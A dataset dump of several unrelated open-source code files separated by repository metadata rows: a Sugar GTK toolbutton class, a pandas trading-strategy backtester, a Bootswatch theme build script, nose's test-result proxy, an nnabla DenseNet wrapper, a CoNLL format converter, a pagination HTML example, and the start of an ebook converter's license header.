def set_accelerator(self, accelerator):
'''
Set keyboard shortcut that activates this button.
Args:
accelerator (string): accelerator to be set. Should be in
form <modifier>Letter.
'''
self._accelerator = accelerator
toolbutton.setup_accelerator(self)
def get_accelerator(self):
'''
Return accelerator string.
'''
return self._accelerator
accelerator = GObject.Property(type=str, setter=set_accelerator,
getter=get_accelerator)
def set_icon_name(self, icon_name):
'''
Set name of icon.
Args:
icon_name (string): name of icon
'''
icon = Icon(icon_name=icon_name,
xo_color=self._xo_color)
self.set_icon_widget(icon)
icon.show()
def get_icon_name(self):
'''
Return icon name, or None if there is no icon name.
'''
if self.props.icon_widget is not None:
return self.props.icon_widget.props.icon_name
else:
return None
icon_name = GObject.Property(type=str, setter=set_icon_name,
getter=get_icon_name)
def set_xo_color(self, xo_color):
'''
Set XoColor of button icon.
Args:
xo_color (sugar3.graphics.xocolor.XoColor): xocolor to be set.
'''
if self._xo_color != xo_color:
self._xo_color = xo_color
if self.props.icon_widget is not None:
self.props.icon_widget.props.xo_color = xo_color
def get_xo_color(self):
'''
Return xocolor.
'''
return self._xo_color
xo_color = GObject.Property(type=object, setter=set_xo_color,
getter=get_xo_color)
def create_palette(self):
return None
def get_palette(self):
return self._palette_invoker.palette
def set_palette(self, palette):
self._palette_invoker.palette = palette
palette = GObject.Property(
type=object, setter=set_palette, getter=get_palette)
def get_palette_invoker(self):
return self._palette_invoker
def set_palette_invoker(self, palette_invoker):
self._palette_invoker.detach()
self._palette_invoker = palette_invoker
palette_invoker = GObject.Property(
type=object, setter=set_palette_invoker, getter=get_palette_invoker)
def do_draw(self, cr):
'''
Implementation method for drawing the button.
'''
if self.palette and self.palette.is_up():
allocation = self.get_allocation()
# draw a black background, has been done by the engine before
cr.set_source_rgb(0, 0, 0)
cr.rectangle(0, 0, allocation.width, allocation.height)
cr.paint()
Gtk.RadioToolButton.do_draw(self, cr)
if self.palette and self.palette.is_up():
invoker = self.palette.props.invoker
invoker.draw_rectangle(cr, self.palette)
return False
def get_hide_tooltip_on_click(self):
'''
Return True if the tooltip is hidden when a user
clicks on the button, otherwise return False.
'''
return self._hide_tooltip_on_click
def set_hide_tooltip_on_click(self, hide_tooltip_on_click):
'''
Set whether or not the tooltip is hidden when a user
clicks on the button.
Args:
hide_tooltip_on_click (bool): True if the tooltip is
hidden on click, and False otherwise.
'''
if self._hide_tooltip_on_click != hide_tooltip_on_click:
self._hide_tooltip_on_click = hide_tooltip_on_click
hide_tooltip_on_click = GObject.Property(
type=bool, default=True, getter=get_hide_tooltip_on_click,
setter=set_hide_tooltip_on_click)
def do_clicked(self):
'''
Implementation method for hiding the tooltip when
the button is clicked.
'''
if self._hide_tooltip_on_click and self.palette:
self.palette.popdown(True)
| lgpl-2.1 | 3,167,136,973,559,909,400 | 29.777778 | 76 | 0.618747 | false | 4.010341 | false | false | false |
hackthemarket/pystrat | sim.py | 1 | 10697 | # simple trading strategy simulator
import pandas as pd
from pandas.tools.plotting import autocorrelation_plot
from pandas.tools.plotting import scatter_matrix
import numpy as np
from scipy import stats
import sklearn
from sklearn import preprocessing as pp
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib import interactive
interactive(True)
import sys
import time
import logging as log
log.basicConfig(level=log.DEBUG)
import glob
import os.path
import pickle
import random
import pdb
pd.set_option('display.width',500)
# define constant friction function
DefaultBPS = 10
def FrictionInBps(U, cfg, kvargs):
""" default FrictionInBps function just returns default,
but the interface receives all strategy info after
strategy is run, so one can create more realistic
impact models """
return DefaultBPS
""" default simulator cfg dictionary.
default keys/values:
FrictionInBps - function that takes same args as strategy.
by default, returns DefaultBps.
InitBal - in $s
Reinvest - should we reinvest our winnings or constantly assume we have InitBal?
Verbose
"""
DEF_SIM_CFG= { 'FrictionInBps': FrictionInBps,
'Verbose' : True,
'InitBal' : 1e7,
'Reinvest' : True }
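# Example (illustrative): override individual defaults by copying the dict,
# e.g. a flat 25bps friction model and a smaller starting balance:
#
#     my_cfg = dict(DEF_SIM_CFG)
#     my_cfg.update({'InitBal': 1e6,
#                    'FrictionInBps': lambda U, cfg, kvargs: 25})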
# columns in prepped univ
SIM_COLS = ["Sym","Product","Instrument",
"Multiplier","Expiry","Strike",
"Open","High","Low","Close","Volume"]
SIM_COLS_OUT = ["Prev_Weight", "Weight", "Prev_Qty", "Qty",
"Trade_Qty", "Trade_Fric", "PNL", "NET_PNL"]
SIM_COL_BALS =[ "NAV","Friction","PNL","NET_PNL", "Longs","Shorts",
"Long_Dlrs","Short_Dlrs","Num_Trades","Turnover","NET_Return"]
def squarem( df, sym='Sym', min_pct=.9 ) :
    # squarem solves the common problem in which you have a large table of
# data grouped by symbols, some of which have missing data. You want to
# 'square' the data such that any symbol which is missing 'too much' data
# is expunged and the remaining data is filled appropriately, leaving you
# with a dataset which has the same # of observations for each symbol.
#
bysyms = df.groupby(sym).size()
idx = df.index.unique()
onumsyms = len(bysyms)
    minlen = int(round(len(idx) * min_pct))
keep = bysyms[bysyms > minlen]
u = df[ df[sym].isin(keep.index) ]
numsyms = len(keep)
    log.info('Got rid of %d/%d symbols', (onumsyms - numsyms), onumsyms)
u.replace(0,np.nan,inplace=True)
u.replace([np.inf, -np.inf], np.nan,inplace=True)
u.sort_index(inplace=True)
uidx = u.index.unique()
# groupby and reindex magic
z = u.groupby(sym).apply(
lambda x: x.reindex(uidx).ffill()).reset_index(0,drop=True)
# badz = z[z.isnull().any(axis=1)]
# if len(badz.index) > 0 :
# badtimes = badz.index.unique().values
# z.drop( badtimes, inplace=True )
# for dt in badtimes:
# log.info('removed %s for NaNs',pd.to_datetime(str(dt)).strftime(
# '%Y-%m-%d'))
return z
def prep_univ( dateTime, symbol,
open, high, low, close, volume,
product, instrument='STK', multiplier=1.0,expiry=None,
strike=None,adv_days=20,sd_days=20, open2close_returns=True,
scaleAndCenter=False, **more_cols) :
# constructs universe appropriate for use with simulator; any additional columns
# passed-in via ellipsis will be added to table as named
#
U = pd.DataFrame({'Sym': symbol,
'Product' : product, 'Instrument':instrument,
'Multiplier': 1.0, 'Expiry': None, 'Strike':None,
'Open':open,'High':high, 'Low':low, 'Close':close,
'Volume':volume }, index=dateTime )
U = U[ SIM_COLS ]
if len(more_cols) > 0:
U = pd.concat( [U, pd.DataFrame(more_cols)], axis=1 )
U.reset_index( inplace=True)
U.sort_values(['Sym','Date'],inplace=True)
U.Date = pd.to_datetime(U.Date)
U.set_index('Date',inplace=True)
if scaleAndCenter :
log.debug('prep_univ: scaling & centering')
raw_scaled = U.groupby('Sym').transform(
lambda x : (x - x.mean())/x.std())
        U = pd.concat([ U.Sym, raw_scaled], axis=1)
# calculate adv, returns, fwd_returns & change in volume
U['ADV'] = U.groupby('Sym')['Volume'].apply(
pd.rolling_mean, adv_days, 1).shift()
U['DeltaV'] = U.groupby('Sym')['Volume'].transform(
lambda x : np.log(x / x.shift()) )
U['Return'] = U.groupby('Sym')['Close'].transform(
lambda x : np.log(x / x.shift()) )
U['Fwd_Close'] = U.groupby('Sym')['Close'].shift(-1)
U['Fwd_Return'] = U.groupby('Sym')['Close'].transform(
lambda x : np.log(x / x.shift()).shift(-1) ) # fwd.returns
U['SD'] = U.groupby('Sym')['Return'].apply(
pd.rolling_std, sd_days, 1).shift()
if open2close_returns:
U['Fwd_Open'] = U.groupby('Sym')['Open'].shift(-1)
U['Fwd_COReturn'] = np.divide(np.add( U.Fwd_Open, -U.Close ),U.Close)
U.ffill(inplace=True)
U.sort_index(inplace=True)
return U
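# Illustrative usage of prep_univ (a sketch -- `px` and its column names are
# assumptions about your own raw OHLCV table, not something defined here):
#
#   U = prep_univ(px.Date, px.Ticker,
#                 px.Open, px.High, px.Low, px.Close, px.Volume,
#                 product='US_EQUITY')
#   U = squarem(U)      # drop symbols with too many missing rows
#   Z, B = sim(U)       # run the default equal-weight strategy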
# simple, default strategy: equal weight universe on daily basis
def eq_wt( U, cfg, kvargs ) :
#pdb.set_trace()
U.Weight = 1/float(len(U.index))
return U
# given today's Universe U and Yesterday's Y, set U's
# Prev_Weight and Prev_Qty to Y's Weight & Qty
# TODO: clean-up
def _getprevs( U, Y ) :
# TODO: surely there's a cleaner way to do this...
wts = Y.reset_index()[['Sym','Weight']]
wts.columns = ['Sym','Prev_Weight']
pwts = U[['Sym']].merge( wts, on = 'Sym' )['Prev_Weight']
U.Prev_Weight=pwts.values
qts = Y.reset_index()[['Sym','Qty']]
qts.columns = ['Sym','Prev_Qty']
pqts = U[['Sym']].merge( qts, on = 'Sym' )['Prev_Qty']
U.Prev_Qty=pqts.values
# functor to run strategy each day and update tbls ...
# TODO: clean-up
def __sim ( U, FUN, cfg, B, kvargs) :
# run sim to set weights
U = FUN( U, cfg, kvargs)
# set prev values for weight & qty...
Y = kvargs.pop('_Y', None)
if Y is not None and not np.all(Y.index==U.index):
_getprevs(U,Y)
loop = 1 + int(kvargs.pop('_L'))
else:
loop = 0
kvargs['_L'] = loop
kvargs['_Y'] = U
bb = B.iloc[loop]
# fill-out trade details
NAV = bb.NAV
tospend = NAV/U.Weight
U.Qty = np.round((NAV*U.Weight) / (U.Multiplier*U.Close))
U.Trade_Qty = U.Qty - U.Prev_Qty
fbps = 1e-4 * cfg['FrictionInBps'](U,cfg,kvargs)
U.Trade_Fric = U.Trade_Qty * U.Close * U.Multiplier * fbps
U.PNL = (U.Fwd_Close - U.Close) * U.Qty * U.Multiplier
U.NET_PNL = U.PNL - U.Trade_Fric
# today's balances are based on yesterday's posns...
longs = U[U.Qty > 0]
shorts = U[U.Qty < 0]
trades = U[U.Trade_Qty != 0]
bb.Friction = U.Trade_Fric.sum()
bb.PNL = U.PNL.sum()
bb.NET_PNL = U.NET_PNL.sum()
bb.Longs = len(longs.index)
bb.Shorts = len(shorts.index)
bb.Long_Dlrs = (longs.Close * longs.Multiplier * longs.Qty).sum()
bb.Short_Dlrs = (shorts.Close * shorts.Multiplier * shorts.Qty).sum()
bb.Num_Trades = len(trades.index)
bb.Turnover = (trades.Close * trades.Multiplier
* trades.Trade_Qty.abs()).sum()/NAV
if loop > 0 :
yb = B.iloc[loop-1]
ynav = yb.NAV
tnav = ynav + yb.NET_PNL
bb.NAV = tnav
bb.NET_Return = (tnav-ynav)/ynav
B.iloc[loop] = bb
# pdb.set_trace()
return U
def sim( univ, sim_FUN=eq_wt, cfg=DEF_SIM_CFG.copy(), kvargs={} ) :
""" simulator: runs simulation and returns a table of activity and balances.
args:
univ - historical data that's been produced by prep_univ
sim_FUN - strategy function. by default, equal weights univ.
cfg - cfg info. by default
kvargs - strat-specific extra data in a dict
"""
#
t0 = time.time()
all_times = univ.index.unique().values
# prepare writable/output side of universe
W = pd.DataFrame( columns=SIM_COLS_OUT, index = univ.index).fillna(0.0)
U = pd.concat( [univ, W], axis=1 )
# create balances table: one per day
B = pd.DataFrame( columns = SIM_COL_BALS, index = all_times ).fillna(0.0)
B.NAV = cfg['InitBal']
# 'daily' loop
Z = U.groupby(U.index).apply( __sim, FUN=sim_FUN,
cfg=cfg, B=B, kvargs=kvargs )
log.info('ran over %d days and %d rows in %d secs', len(all_times),
len(U.index),time.time()-t0)
# summarize results a bit more...?
#ts=xts(B$Net.Return,order.by=B$DateTime)
# return universe and balances
#list(U=U,B=B, ts=ts)
return Z, B
def sharpe(Returns) :
return np.sqrt(252) * np.mean(Returns)/np.std(Returns)
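# Example: annualized Sharpe ratio of a backtest's daily net returns
# (a sketch; assumes U was built with prep_univ and B is the balances
# table returned by sim()):
#
#   Z, B = sim(U, sim_FUN=best_strat)
#   print(sharpe(B.NET_Return))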
def random_strat( U, cfg, kvargs ) :
# random portfolio strategy: picks 'num_names' randomly
nnames = kvargs.get('num_names',10)
names = random.sample(U.Sym, nnames )
U.Weight = np.where( U.Sym.isin( names ), 1/float(nnames), 0 )
return U
def best_strat( U, cfg, kvargs ) :
# portfolio strategy: picks 'num_names' based on trailing return
nnames = kvargs.get('num_names',10)
#pdb.set_trace()
    best = U.sort_values('Return',ascending=False,
                         na_position='last')['Sym'].head(nnames).values
U.Weight = np.where( U.Sym.isin( best ), 1/float(nnames), 0 )
return U
def worst_strat( U, cfg, kvargs ) :
# portfolio strategy: picks 'num_names' based on trailing return
nnames = kvargs.get('num_names',10)
#pdb.set_trace()
    worst = U.sort_values('Return',ascending=True,
                          na_position='last')['Sym'].head(nnames).values
U.Weight = np.where( U.Sym.isin( worst ), 1/float(nnames), 0 )
return U
def rtest(U,FUN=random_strat, runs=10):
# run given strat repeatedly, plotting NAVs and Returning them
# nb: this only makes sense if the strategy is random...
# run random_strat 'runs' times and plot NAVs
N = None
for i in range(runs) :
_,b = sim( U, sim_FUN=FUN )
n = pd.DataFrame(b.NAV)
N = n if N is None else pd.concat([N,n],axis=1)
N.plot(legend=False)
return N
def sim_test():
# dev driver
f = 'U.pkl'
P = pickle.load(open(f))
log.info('loaded <%s>',f)
P.describe()
U = P[P.index >= '2005-01-01']
U.describe()
import sim
_,B = sim.sim(U)
#plot NAV
B.NAV.plot(title='Equal Weight Everyone')
return B
| gpl-3.0 | 3,906,262,475,805,889,000 | 32.015432 | 84 | 0.597177 | false | 3.08894 | false | false | false |
douglaskastle/bootswatch | convert_bootswatch_mutara.py | 1 | 7972 | import re
import os
values = {
# 'uc': 'Grissom',
'lc': 'mutara',
'header': 'Michroma',
'body': 'Play',
'website': 'mavek_org',
# 'cl': '#116BB7',
}
def main():
src = 'cyborg'
cmd = 'cp -r {0}/* {1}'.format(src, values['lc'])
os.system(cmd)
infile = "{0}/bootswatch.less".format(src)
f = open(infile, 'r')
lines = f.readlines()
f.close()
outfile = values['lc'] + "/bootswatch.less"
f = open(outfile, 'w')
for line in lines:
line = re.sub(src.title(), values['lc'].title(), line)
if re.search("Roboto", line):
continue
if re.search("web-font-path", line):
line = '@web-font-path2: "https://fonts.googleapis.com/css?family={0}:400,700,400italic";\n'.format(values['body']) + line
line = '@web-font-path: "https://fonts.googleapis.com/css?family={0}:300italic,400italic,700italic,400,300,700";\n'.format(values['header']) + line
line = line + '.web-font(@web-font-path2);\n'
f.write(line)
f.close()
infile = "{0}/variables.less".format(src)
f = open(infile, 'r')
lines = f.readlines()
f.close()
swap_list = {
'@brand-primary:': '@brand-primary: #00ff00',
'@brand-success:': '@brand-success: #0000ff',
'@text-color:': '@text-color: #ffffff',
'@headings-color:': '@headings-color: #00ff00',
'@border-radius-base:': '@border-radius-base: 20px',
'@border-radius-large:': '@border-radius-large: 22px',
'@border-radius-small:': '@border-radius-small: 19px',
'@component-active-color:': '@component-active-color: #00ff00',
'@btn-default-color:': '@btn-default-color: #000',
'@btn-default-bg:': '@btn-default-bg: lighten(@gray-dark, 50%)',
'@input-bg:': '@input-bg: @gray-dark',
'@input-group-addon-bg:': '@input-group-addon-bg: @gray-lighter',
'@dropdown-border:': '@dropdown-border: rgba(0,255,0,0.1)',
'@dropdown-divider-bg:': '@dropdown-divider-bg: rgba(0,255,0,0.1)',
'@dropdown-link-color:': '@dropdown-link-color: #00ff00',
'@dropdown-link-hover-color:': '@dropdown-link-hover-color: #00ff00',
'@dropdown-link-active-color:': '@dropdown-link-active-color: #00ff00',
'@navbar-default-link-hover-color:': '@navbar-default-link-hover-color: #00ff00',
'@navbar-default-link-active-color:': '@navbar-default-link-active-color: #00ff00',
'@navbar-default-brand-color:': '@navbar-default-brand-color: #00ff00',
'@navbar-default-brand-hover-color:': '@navbar-default-brand-hover-color: #00ff00',
'@navbar-inverse-link-hover-color:': '@navbar-inverse-link-hover-color: #0000ff',
'@navbar-inverse-brand-color:': '@navbar-inverse-brand-color: #0000ff',
'@navbar-inverse-brand-hover-color:': '@navbar-inverse-brand-hover-color: #0000ff',
'@navbar-inverse-toggle-hover-bg:': '@navbar-inverse-toggle-hover-bg: #8080ff',
'@navbar-inverse-toggle-icon-bar-bg:': '@navbar-inverse-toggle-icon-bar-bg: #0000ff',
'@navbar-inverse-toggle-border-color:': '@navbar-inverse-toggle-border-color: #8080ff',
'@nav-tabs-active-link-hover-color:': '@nav-tabs-active-link-hover-color: #000',
'@pagination-color:': '@pagination-color: #000',
'@pagination-bg:': '@pagination-bg: @gray',
'@pagination-hover-color:': '@pagination-hover-color: #000',
'@pagination-active-color:': '@pagination-active-color: #000',
'@pagination-disabled-bg:': '@pagination-disabled-bg: @gray',
'@state-success-text:': '@state-success-text: #000',
'@state-info-text:': '@state-info-text: #000',
'@state-warning-text:': '@state-warning-text: #000',
'@state-danger-text:': '@state-danger-text: #000',
'@tooltip-bg:': '@tooltip-bg: #000',
'@popover-bg:': '@popover-bg: lighten(@body-bg, 10%)',
'@popover-fallback-border-color:': '@popover-fallback-border-color: #999',
'@popover-arrow-outer-color:': '@popover-arrow-outer-color: fadein(@popover-border-color, 5%)',
'@popover-arrow-outer-fallback-color:': '@popover-arrow-outer-fallback-color: darken(@popover-fallback-border-color, 20%)',
'@label-color:': '@label-color: #000',
'@label-link-hover-color:': '@label-link-hover-color: #000',
'@list-group-link-heading-color:': '@list-group-link-heading-color: #000',
'@panel-primary-text:': '@panel-primary-text: #000',
'@badge-color:': '@badge-color: #000',
'@badge-link-hover-color:': '@badge-link-hover-color: #000',
'@badge-active-bg:': '@badge-active-bg: #000',
'@breadcrumb-color:': '@breadcrumb-color: #00ff00',
'@carousel-control-color:': '@carousel-control-color: #000',
# '': '',
}
outfile = values['lc'] + "/variables.less"
f = open(outfile, 'w')
for line in lines:
line = re.sub(src.title(), values['lc'].title(), line)
line = re.sub(src, values['lc'], line)
#line = re.sub('Roboto', 'Michroma', line)
for s in swap_list.keys():
if re.search(s, line):
line = swap_list[s] + ";\n"
line = re.sub('headings-font-family: @font-family-base', 'headings-font-family: @font-family-header-sans-serif', line)
if re.search("Roboto", line):
line = re.sub('Roboto', '{0}'.format(values['body']), line)
line = '@font-family-header-sans-serif: "{0}", "Helvetica Neue", Helvetica, Arial, sans-serif;\n'.format(values['header']) + line
f.write(line)
f.close()
infile = "{0}/index.html".format(src)
f = open(infile, 'r')
lines = f.readlines()
f.close()
outfile = values['lc'] + "/index.html"
f = open(outfile, 'w')
for line in lines:
line = re.sub(src.title(), values['lc'].title(), line)
line = re.sub(src, values['lc'], line)
line = re.sub('UA-[0-9\-]+', '', line)
if re.search('bootstrap.css" media="screen"', line):
line = line + ' <link rel="stylesheet" href="./bootstrap_fixes.css" media="screen">\n'
f.write(line)
f.close()
grunt = "/cygdrive/c/Users/keeshand/AppData/Roaming/npm/grunt"
cmd = "{0} swatch:{1}".format(grunt, values['lc'])
os.system(cmd)
cmd = "cp {0}/bootstrap.min.css ../{1}/pelican-themes/bootstrap3/static/css/bootstrap.{0}.min.css".format(values['lc'], values['website'])
os.system(cmd)
cmd = "cp {0}/bootstrap_fixes.css ../{1}/pelican-themes/bootstrap3/static/css/bootstrap_fixes.{0}.css".format(values['lc'], values['website'])
os.system(cmd)
if __name__ == '__main__':
main()
| mit | -6,429,890,791,821,344,000 | 53.97931 | 159 | 0.49147 | false | 3.551002 | false | false | false |
sony/nnabla | python/src/nnabla/models/imagenet/densenet.py | 1 | 2722 | # Copyright 2019,2020,2021 Sony Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from nnabla.utils.nnp_graph import NnpNetworkPass
from .base import ImageNetBase
class DenseNet(ImageNetBase):
"""
    The following is a list of strings that can be specified to the ``use_up_to`` option in the ``__call__`` method:
* ``'classifier'`` (default): The output of the final affine layer for classification.
* ``'pool'``: The output of the final global average pooling.
* ``'lastconv'``: The output from last denseblock.
* ``'lastconv+relu'``: Network up to ``'lastconv'`` followed by ReLU activation.
References:
* `Huang et al., Densely Connected Convolutional Networks.
<https://arxiv.org/abs/1608.06993>`_
"""
_KEY_VARIABLE = {
'classifier': 'DenseNet/Affine',
'pool': 'DenseNet/AveragePooling_4',
'lastconv': 'DenseNet/BatchNormalization_5',
'lastconv+relu': 'DenseNet/ReLU_5',
}
def __init__(self):
# Load nnp
self._load_nnp('DenseNet-161.nnp', 'DenseNet-161/DenseNet-161.nnp')
def _input_shape(self):
return (3, 224, 224)
def __call__(self, input_var=None, use_from=None, use_up_to='classifier', training=False, force_global_pooling=False, check_global_pooling=True, returns_net=False, verbose=0):
assert use_from is None, 'This should not be set because it is for forward compatibility.'
input_var = self.get_input_var(input_var)
callback = NnpNetworkPass(verbose)
callback.remove_and_rewire('ImageAugmentationX')
callback.set_variable('InputX', input_var)
self.configure_global_average_pooling(
callback, force_global_pooling, check_global_pooling, 'DenseNet/AveragePooling_4')
callback.set_batch_normalization_batch_stat_all(training)
self.use_up_to(use_up_to, callback)
if not training:
callback.fix_parameters()
batch_size = input_var.shape[0]
net = self.nnp.get_network(
'Train', batch_size=batch_size, callback=callback)
if returns_net:
return net
return list(net.outputs.values())[0]
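# Example usage (a hedged sketch; assumes `nn` is `import nnabla as nn` and an
# ImageNet-preprocessed 224x224 RGB batch -- not part of this module):
#
#   model = DenseNet()
#   x = nn.Variable((1, 3, 224, 224))
#   y = model(x, use_up_to='classifier', training=False)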
| apache-2.0 | 6,252,650,887,576,425,000 | 38.449275 | 179 | 0.669361 | false | 3.764869 | false | false | false |
robertostling/efselab | scripts/conll2tab.py | 1 | 1221 | # Script to convert CoNLL files with tag+morphology into the simple two-column
# format assumed by efselab.
#
# If only the tag is required, conversion can more easily be done like this:
#
# cut -f 2,4 file.conll >file.tab
"""
cat /home/corpora/SUC3.0/corpus/conll/blogs.conll /home/corpora/SUC3.0/corpus/conll/suc-train.conll | python3 conll2tab.py ne >../suc-data/suc-blogs-ne-train.tab
cat /home/corpora/SUC3.0/corpus/conll/suc-dev.conll | python3 conll2tab.py ne >../suc-data/suc-ne-dev.tab
cat /home/corpora/SUC3.0/corpus/conll/suc-test.conll | python3 conll2tab.py ne >../suc-data/suc-ne-test.tab
"""
import sys
include_ne = 'ne' in sys.argv[1:]
for line in sys.stdin:
fields = line.rstrip('\n').split('\t')
if len(fields) >= 6:
word = fields[1]
pos = fields[3]
if pos == 'LE': pos = 'IN'
tag = pos+'|'+fields[5] if (fields[5] and fields[5] != '_') else pos
if include_ne and len(fields) >= 12:
ne = fields[10] if fields[11] == '_' else (
'%s-%s' % (fields[10], fields[11]))
lemma = fields[2]
print(word+'\t'+lemma+'\t'+tag+'\t'+ne)
else:
print(word+'\t'+tag)
else:
print()
| gpl-3.0 | -248,659,985,629,635,300 | 34.911765 | 161 | 0.600328 | false | 2.806897 | false | false | false |
mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/eggs/nose-0.11.1-py2.7.egg/nose/proxy.py | 1 | 5945 | """
Result Proxy
------------
The result proxy wraps the result instance given to each test. It
performs two functions: enabling extended error/failure reporting
and calling plugins.
As each result event is fired, plugins are called with the same event;
however, plugins are called with the nose.case.Test instance that
wraps the actual test. So when a test fails and calls
result.addFailure(self, err), the result proxy calls
addFailure(self.test, err) for each plugin. This allows plugins to
have a single stable interface for all test types, and also to
manipulate the test object itself by setting the `test` attribute of
the nose.case.Test that they receive.
"""
import logging
from nose.config import Config
log = logging.getLogger(__name__)
def proxied_attribute(local_attr, proxied_attr, doc):
"""Create a property that proxies attribute ``proxied_attr`` through
the local attribute ``local_attr``.
"""
def fget(self):
return getattr(getattr(self, local_attr), proxied_attr)
def fset(self, value):
setattr(getattr(self, local_attr), proxied_attr, value)
def fdel(self):
delattr(getattr(self, local_attr), proxied_attr)
return property(fget, fset, fdel, doc)
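# Minimal sketch of what proxied_attribute builds: a property on the proxy
# class that forwards reads/writes/deletes to the wrapped object (this mirrors
# the real declarations at the bottom of this module, e.g. `shouldStop`).
#
#   class SomeProxy(object):
#       def __init__(self, result):
#           self.result = result
#       shouldStop = proxied_attribute('result', 'shouldStop',
#                                      """Should the test run stop?""")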
class ResultProxyFactory(object):
"""Factory for result proxies. Generates a ResultProxy bound to each test
and the result passed to the test.
"""
def __init__(self, config=None):
if config is None:
config = Config()
self.config = config
self.__prepared = False
self.__result = None
def __call__(self, result, test):
"""Return a ResultProxy for the current test.
On first call, plugins are given a chance to replace the
result used for the remaining tests. If a plugin returns a
value from prepareTestResult, that object will be used as the
result for all tests.
"""
if not self.__prepared:
self.__prepared = True
plug_result = self.config.plugins.prepareTestResult(result)
if plug_result is not None:
self.__result = result = plug_result
if self.__result is not None:
result = self.__result
return ResultProxy(result, test, config=self.config)
class ResultProxy(object):
"""Proxy to TestResults (or other results handler).
One ResultProxy is created for each nose.case.Test. The result
proxy calls plugins with the nose.case.Test instance (instead of
the wrapped test case) as each result call is made. Finally, the
real result method is called, also with the nose.case.Test
instance as the test parameter.
"""
def __init__(self, result, test, config=None):
if config is None:
config = Config()
self.config = config
self.plugins = config.plugins
self.result = result
self.test = test
def __repr__(self):
return repr(self.result)
def assertMyTest(self, test):
# The test I was called with must be my .test or my
# .test's .test. or my .test.test's .case
case = getattr(self.test, 'test', None)
assert (test is self.test
or test is case
or test is getattr(case, '_nose_case', None)), (
"ResultProxy for %r (%s) was called with test %r (%s)"
% (self.test, id(self.test), test, id(test)))
def afterTest(self, test):
self.assertMyTest(test)
self.plugins.afterTest(self.test)
if hasattr(self.result, "afterTest"):
self.result.afterTest(self.test)
def beforeTest(self, test):
self.assertMyTest(test)
self.plugins.beforeTest(self.test)
if hasattr(self.result, "beforeTest"):
self.result.beforeTest(self.test)
def addError(self, test, err):
self.assertMyTest(test)
plugins = self.plugins
plugin_handled = plugins.handleError(self.test, err)
if plugin_handled:
return
# test.passed is set in result, to account for error classes
formatted = plugins.formatError(self.test, err)
if formatted is not None:
err = formatted
plugins.addError(self.test, err)
self.result.addError(self.test, err)
if not self.result.wasSuccessful() and self.config.stopOnError:
self.shouldStop = True
def addFailure(self, test, err):
self.assertMyTest(test)
plugins = self.plugins
plugin_handled = plugins.handleFailure(self.test, err)
if plugin_handled:
return
self.test.passed = False
formatted = plugins.formatFailure(self.test, err)
if formatted is not None:
err = formatted
plugins.addFailure(self.test, err)
self.result.addFailure(self.test, err)
if self.config.stopOnError:
self.shouldStop = True
def addSuccess(self, test):
self.assertMyTest(test)
self.plugins.addSuccess(self.test)
self.result.addSuccess(self.test)
def startTest(self, test):
self.assertMyTest(test)
self.plugins.startTest(self.test)
self.result.startTest(self.test)
def stop(self):
self.result.stop()
def stopTest(self, test):
self.assertMyTest(test)
self.plugins.stopTest(self.test)
self.result.stopTest(self.test)
# proxied attributes
shouldStop = proxied_attribute('result', 'shouldStop',
"""Should the test run stop?""")
errors = proxied_attribute('result', 'errors',
"""Tests that raised an exception""")
failures = proxied_attribute('result', 'failures',
"""Tests that failed""")
testsRun = proxied_attribute('result', 'testsRun',
"""Number of tests run""")
| gpl-3.0 | 5,547,417,367,787,775,000 | 34.386905 | 77 | 0.622876 | false | 4.195483 | true | false | false |
meowtec/page-navigator | example.py | 1 | 2364 | # coding:utf-8
html_tpl = '''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
<style type="text/css">
.nav{
margin: 10px 0;
font-size: 12px;
font-family: "Helvetica", "Arial", sans-serif;
}
.nav a{
text-decoration: none;
color: #000;
}
.nav span{
color: #999;
}
.nav .item{
display: inline-block;
padding: 3px 8px;
margin: 0 3px;
}
.nav a.number:hover{
background: #99dddd;
color: #ffffff;
}
.nav span.current{
background: #9cc;
color: #fff;
}
.nav a.prev:hover, .nav a.next:hover{
color: #9cc;
}
h2{
margin-top: 2em;
}
</style>
</head>
<body>
<h2>基本</h2>
<div class="nav">{{html_1_1}}</div>
<div class="nav">{{html_1_2}}</div>
<div class="nav">{{html_1_3}}</div>
<div class="nav">{{html_1_4}}</div>
<div class="nav">{{html_1_5}}</div>
<div class="nav">{{html_1_6}}</div>
<h2>设置</h2>
<div class="nav">{{html_2_1}}</div>
<h2>自定义Helper</h2>
<div class="nav">{{html_3_1}}</div>
</body>
</html>
'''
from pagenavigator import PageNavigator
def string_replace(string, **data):
for key in data:
string = string.replace('{{' + key + '}}', str(data[key]))
return string
nav_1 = PageNavigator()
html_1_1 = nav_1.create(1, 5)
html_1_2 = nav_1.create(2, 5)
html_1_3 = nav_1.create(5, 5)
html_1_4 = nav_1.create(1, 6)
html_1_5 = nav_1.create(5, 6)
html_1_6 = nav_1.create(5, 10)
nav_2 = PageNavigator(link_helper='list.html?page={{page}}&from={{current}}&max={{max}}',
prev_text='←', next_text='→', more_text='……', size=9)
html_2_1 = nav_2.create(10, 20)
nav_3 = PageNavigator(number_helper='<button href="{{link}}" class="item number" data-page="{{page}}">{{page}}</button>',
current_helper='<button class="item number current" data-page="{{page}}" disabled="disabled">{{page}}</button>')
html_3_1 = nav_3.create(10, 20)
html = string_replace(html_tpl, html_1_1=html_1_1, html_1_2=html_1_2, html_1_3=html_1_3,
html_1_4=html_1_4, html_1_5=html_1_5, html_1_6=html_1_6,
html_2_1=html_2_1,
html_3_1=html_3_1
)
file_object = open('python_example.html', 'w')
file_object.write(html)
file_object.close( )
| mit | -406,984,751,838,615,360 | 24.736264 | 134 | 0.551665 | false | 2.548422 | false | false | false |
ehovind/extensible-ebook-converter | eecon_fetcher.py | 1 | 3151 | #!/usr/bin/env python
"""
This file is part of Extensible eBook Converter (EeCon),
an advanced ebook analysis and conversion tool.
Copyright (C) 2012 Espen Hovind <[email protected]>
EeCon is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
EeCon is distributed in the hope that it will be useful,
